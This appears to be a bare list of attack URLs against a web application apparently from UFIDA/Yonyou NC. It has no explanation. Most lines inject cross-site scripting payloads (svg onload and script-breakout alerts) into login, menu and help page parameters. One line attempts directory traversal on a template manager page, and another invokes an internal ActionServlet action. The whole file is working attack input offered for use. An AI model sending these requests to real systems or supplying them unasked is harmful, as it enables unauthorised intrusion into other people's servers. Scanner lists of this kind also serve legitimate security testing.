/login.jsp?onlyOnePerVM=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/login.jsp?redirect=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/login.jsp?nodeid=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/index.jsp
/menu.jsp?flag=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E
/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E
/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E
/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../
/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease
